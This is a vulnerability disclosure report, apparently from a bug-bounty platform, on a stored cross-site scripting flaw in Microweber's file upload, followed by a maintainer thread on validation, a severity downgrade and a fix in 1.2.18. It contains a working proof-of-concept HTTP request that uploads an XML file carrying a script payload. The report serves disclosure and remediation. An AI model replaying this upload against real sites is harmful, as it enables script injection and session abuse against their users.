Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber


Reported on

Jul 2nd 2022


In file upload function, the server allow upload .xlr file with contain some javascript code lead to XSS.

Proof of Concept


POST /demo/plupload HTTP/1.1
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="chunk"

Content-Disposition: form-data; name="chunks"

Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
        <a:script xmlns:a="">alert(window.origin)</a:script>


HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129


PoC Image



This vulnerability can be arbitrarily executed javascript code to perform HTTP request, CSRF, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov modified the Severity from Medium to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.18 with commit 39797c a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Files.php#L1161 has been validated
Peter Ivanov
a year ago


Thanks for the report. In order to upload the .xlr file you need to be logged as admin

a year ago


Yah! Thank you, sir!

to join this conversation